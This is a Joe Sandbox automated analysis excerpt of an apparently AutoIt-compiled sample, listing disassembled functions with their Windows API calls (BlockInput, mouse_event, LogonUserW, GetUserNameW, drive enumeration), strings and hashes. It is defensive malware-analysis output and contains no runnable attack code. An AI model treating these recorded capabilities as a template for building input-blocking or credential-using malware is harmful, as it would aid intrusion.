Opcode ID: cdc93aa4c927006ee6f4c80e7e1877ef7f2da10502dc4338fd23ae517ac604dc
Instruction ID: b5acf4f97330fb645ef09183d5cf4def16013217000f19d2bbf05d6c126bae28
Opcode Fuzzy Hash: cdc93aa4c927006ee6f4c80e7e1877ef7f2da10502dc4338fd23ae517ac604dc
Instruction Fuzzy Hash: 7322BA715087119FDB24DF24D890BAFB7EAAF84310F10491DF89A8B291DB31E945CFA6

Function 0065038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997b27585f924c7b41cb0eb7433dbbb17a7050c9584562c8844ec5497c5f2991
Instruction ID: 776b4b24e3902e89816fc94d30640f49f069424921c94f31b27d6f3d6d58cbf4
Opcode Fuzzy Hash: 997b27585f924c7b41cb0eb7433dbbb17a7050c9584562c8844ec5497c5f2991
Instruction Fuzzy Hash: 99B1AC60D2AF414DD763A6398831336B65DAFBB2D5B91E71BFC2B74D22EB2185C34180

Function 0066B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0066B6DF

Part of subcall function 0064344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0066BDC3,00000000,?,?,?,?,0066BF70,00000000,?), ref: 00643453
Part of subcall function 0064344A: __aulldiv.LIBCMT ref: 00643473

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 1acf6a8bd2518ffa53fa0ceeddc6ba9ba0b907be01f37270db0d3323c43aa88a
Instruction ID: 8ed16cb65e658dc144e6b73e5c7f85ecaf839c6c872868a520afede1de862081
Opcode Fuzzy Hash: 1acf6a8bd2518ffa53fa0ceeddc6ba9ba0b907be01f37270db0d3323c43aa88a
Instruction Fuzzy Hash: CF217272634650CBC729CF28C881A92B7E2EB95310B249E6DE4E5CF2C0CB74BA45DB54

Function 00676AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00676ACA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: ea2ca54ae963377c6ef3edf4daa312015c8f91794c2f8b01e8d0e20759a7dcda
Instruction ID: a0589f71a7cdb465dfba5eaefa8291dedd6382a7fd472f9e8bf229740e66a94d
Opcode Fuzzy Hash: ea2ca54ae963377c6ef3edf4daa312015c8f91794c2f8b01e8d0e20759a7dcda
Instruction Fuzzy Hash: E5E04835200214AFC740EF59D404D96B7EEAF74751F04D41AF94AD7351DAB0F8048BA0

Function 006674E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0066750A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: d2cc7c702b162d0202d69db8c19c591b7d9801744417d7f7176f4660e5891560
Instruction ID: 997bab1a592673c9abb0b3576d8212bed37ab9d04dc1c874d278d974b31cd8ac
Opcode Fuzzy Hash: d2cc7c702b162d0202d69db8c19c591b7d9801744417d7f7176f4660e5891560
Instruction Fuzzy Hash: DDD052A013C20438EC2987208C1FFFB0A8BF38078CFD4428AB203D92C0ECE86D02A070

Function 0065B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0065AD3E), ref: 0065B124

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: c046b29492ad5e12840e0d4362c67e0cee9987e223fa2b6e9cec773a1b999de8
Instruction ID: 78dea7ed55ddd76531312b62c726cf5ae2ab6694a899fd0f3ede3dd2cf60c1ab
Opcode Fuzzy Hash: c046b29492ad5e12840e0d4362c67e0cee9987e223fa2b6e9cec773a1b999de8
Instruction Fuzzy Hash: 75D05E320A460EAEDF025FA4DC02EAE3F6AEB04700F408110FA12C50A0C671D531AF50

Function 0069B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0069B352

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c79c4616a5c1e5d21b7feb2fe9ebf3dfdaf3922fae088235dd33e596bce483a1
Instruction ID: 41ff425b21b6369c008edcdc4be9d9280d82480c2046d4f90a06e559967991a1
Opcode Fuzzy Hash: c79c4616a5c1e5d21b7feb2fe9ebf3dfdaf3922fae088235dd33e596bce483a1
Instruction Fuzzy Hash: 8BC04CB1400109DFCB51DFC0C9449EEB7BDAB04305F105091A106F1510D7709B859F72

Function 00648189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0064818F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: de3792e979e69e9abad864af99ca9a672951abc99c49898bd8f8ed7b297300f6
Instruction ID: 7b061154f7443066ae4280db9de1e01bdb94eb552f6ed9cba916a27dec5fb24a
Opcode Fuzzy Hash: de3792e979e69e9abad864af99ca9a672951abc99c49898bd8f8ed7b297300f6
Instruction Fuzzy Hash: C0A0113000020CAB8F002B82EC088883F2EEA022A0B000020F80E808208B22A8208A82

Function 0062E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bd843b5dd0330ff7e1e0994229c1622c5e30a7f5c69fe5e500ccb3132ca77b
Instruction ID: d31467614d4bc996b4f12c5090796233de1c1e9c499c87c7939e220e7d4d9e7f
Opcode Fuzzy Hash: 67bd843b5dd0330ff7e1e0994229c1622c5e30a7f5c69fe5e500ccb3132ca77b
Instruction Fuzzy Hash: C922AF74900625CFDB24DF54D490AEAB7F2FF14314F248079E98AAB351E736A981CF91

Function 006293F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce4c3ac322d5422c9d69f588a56dc9c787cff398afd1babbeee2cf01b1a49eb
Instruction ID: 1311ff02d6f78d93548924fa9c769519e74c0ce4e2a75ccf2f87b55a75d3af6f
Opcode Fuzzy Hash: 5ce4c3ac322d5422c9d69f588a56dc9c787cff398afd1babbeee2cf01b1a49eb
Instruction Fuzzy Hash: BE12A170A00619EFDF04DFA5E991AEEB7F6FF48300F104529E806E7650EB36A911CB64

Function 0062AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 86643eecf29e44e08a0d5f89d2945e73faf0191a94425ecf0cb562196975b471
Instruction ID: 4a15937ba4b706f12ba292409aeac69642a8cfdc03e0993f4eef5f21b43fb30b
Opcode Fuzzy Hash: 86643eecf29e44e08a0d5f89d2945e73faf0191a94425ecf0cb562196975b471
Instruction Fuzzy Hash: D302B270E00216EBCF54DF68D991AAEB7FAFF44300F148069E806DB295EB31DA15CB95

Function 006402A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 899a9f98c086ad0edaac6e5a3bce95df8f54784e6d71f04e75a239c789a874b3
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 6DC1A8322051A34AEF2D473984344BEFAA25F917B1B1A176DE9B3CB6D5EF30C524D620

Function 006406D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: d65016f326e5eacdb1c6077af731ea87a0c404bee229a2c17fa230f16343e128
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 47C1C6322051A309EF2D4739C4344BEBAA25FA27B171A176DE5B3CB6D5EF30C524D620

Function 0063FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 541f8a0fff997c132c515462313e55b18cacb7e7607250483b6498fd1c07e741
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 43C17F3260509309DF2D473984744BEBAA25FA2BB1F1A177DE4B3CB6D5EE20C524D660

Function 0067A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0067A2FE
DeleteObject.GDI32(00000000), ref: 0067A310
DestroyWindow.USER32 ref: 0067A31E
GetDesktopWindow.USER32 ref: 0067A338
GetWindowRect.USER32(00000000), ref: 0067A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0067A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0067A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A4D8
GetClientRect.USER32(00000000,?), ref: 0067A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0067A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A55E
GlobalLock.KERNEL32(00000000), ref: 0067A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A576
GlobalUnlock.KERNEL32(00000000), ref: 0067A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A586
GlobalFree.KERNEL32(00000000), ref: 0067A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006AD9BC,00000000), ref: 0067A5B9
GlobalFree.KERNEL32(00000000), ref: 0067A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0067A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0067A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A81D

Strings

DISPLAY, xrefs: 0067A680
static, xrefs: 0067A518, 0067A66F
, xrefs: 0067A7A3
AutoIt v3, xrefs: 0067A4D0

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e30e5fae1c8f6ac9800e8a69f72f6d9de4c089259617564c0d1fe4bd34ed72ce
Instruction ID: 57184bb8f27f242fb6b2a1829bf70d7073fa871c48fa39c62002538a926dab6c
Opcode Fuzzy Hash: e30e5fae1c8f6ac9800e8a69f72f6d9de4c089259617564c0d1fe4bd34ed72ce
Instruction Fuzzy Hash: 2B025F75900254EFDB14DFA4DD89EAE7BBAFB49310F008158F91AAB2A0D770AD41CF61

Function 0068D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0068D2DB
GetSysColorBrush.USER32(0000000F), ref: 0068D30C
GetSysColor.USER32(0000000F), ref: 0068D318
SetBkColor.GDI32(?,000000FF), ref: 0068D332
SelectObject.GDI32(?,00000000), ref: 0068D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0068D36C
GetSysColor.USER32(00000010), ref: 0068D374
CreateSolidBrush.GDI32(00000000), ref: 0068D37B
FrameRect.USER32(?,?,00000000), ref: 0068D38A
DeleteObject.GDI32(00000000), ref: 0068D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0068D3DC
FillRect.USER32(?,?,00000000), ref: 0068D40E
GetWindowLongW.USER32(?,000000F0), ref: 0068D439

Part of subcall function 0068D575: GetSysColor.USER32(00000012), ref: 0068D5AE
Part of subcall function 0068D575: SetTextColor.GDI32(?,?), ref: 0068D5B2
Part of subcall function 0068D575: GetSysColorBrush.USER32(0000000F), ref: 0068D5C8
Part of subcall function 0068D575: GetSysColor.USER32(0000000F), ref: 0068D5D3
Part of subcall function 0068D575: GetSysColor.USER32(00000011), ref: 0068D5F0
Part of subcall function 0068D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068D5FE
Part of subcall function 0068D575: SelectObject.GDI32(?,00000000), ref: 0068D60F
Part of subcall function 0068D575: SetBkColor.GDI32(?,00000000), ref: 0068D618
Part of subcall function 0068D575: SelectObject.GDI32(?,?), ref: 0068D625
Part of subcall function 0068D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0068D644
Part of subcall function 0068D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068D65B
Part of subcall function 0068D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0068D670
Part of subcall function 0068D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068D698

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 6eaff8739e9a65648004700dfc14b98dd336ce0a9f58d0709b78a2d78316c3ef
Instruction ID: 35041fd33aa8fc055a137ed8e829db8350a6a0d0d748799c4a3531918b16139c
Opcode Fuzzy Hash: 6eaff8739e9a65648004700dfc14b98dd336ce0a9f58d0709b78a2d78316c3ef
Instruction Fuzzy Hash: 66917F71408301BFC710AF64DC48EABBBAAFB8A325F101B19F562965E0D771E945CF62

Function 0063B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0063B98B
DeleteObject.GDI32(00000000), ref: 0063B9CD
DeleteObject.GDI32(00000000), ref: 0063B9D8
DestroyIcon.USER32(00000000), ref: 0063B9E3
DestroyWindow.USER32(00000000), ref: 0063B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0069D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0069D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0069D711

Part of subcall function 0063B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0063B759,?,00000000,?,?,?,?,0063B72B,00000000,?), ref: 0063BA58

SendMessageW.USER32 ref: 0069D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0069D76F
ImageList_Destroy.COMCTL32(00000000), ref: 0069D785
ImageList_Destroy.COMCTL32(00000000), ref: 0069D790

Strings

0, xrefs: 0069D5A5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: d020694221eaa5fa2ce02a737413c79382fa7e4eef3a03ef8cc4e7606b816833
Instruction ID: c04559b1b89b4020d2037f87db19cff4bba7854a3289cb6728d112d0718385d9
Opcode Fuzzy Hash: d020694221eaa5fa2ce02a737413c79382fa7e4eef3a03ef8cc4e7606b816833
Instruction Fuzzy Hash: A8127E34604201DFDB15DF28C884BA9B7EAFF46304F145579EA89CBAA2C731EC46CB91

Function 0066DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066DBD6
GetDriveTypeW.KERNEL32(?,006BDC54,?,\\.\,006BDC00), ref: 0066DCC3
SetErrorMode.KERNEL32(00000000,006BDC54,?,\\.\,006BDC00), ref: 0066DE29

Strings

PhysicalDrive, xrefs: 0066DC67
MMC, xrefs: 0066DDE7
Removable, xrefs: 0066DD15
USB, xrefs: 0066DDBD
RAID, xrefs: 0066DDC4
ATAPI, xrefs: 0066DD9A
SAS, xrefs: 0066DDD2
SSD, xrefs: 0066DD50
SATA, xrefs: 0066DDD9
CDROM, xrefs: 0066DCF7
Virtual, xrefs: 0066DDEE
Fibre, xrefs: 0066DDB6
FileBackedVirtual, xrefs: 0066DDF5
1394, xrefs: 0066DDA8
\\.\, xrefs: 0066DC2B
Unknown, xrefs: 0066DCE3, 0066DD8C
Network, xrefs: 0066DD01
SCSI, xrefs: 0066DD93
RAMDisk, xrefs: 0066DCED
iSCSI, xrefs: 0066DDCB
Fixed, xrefs: 0066DD0B
ATA, xrefs: 0066DDA1
SSA, xrefs: 0066DDAF

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
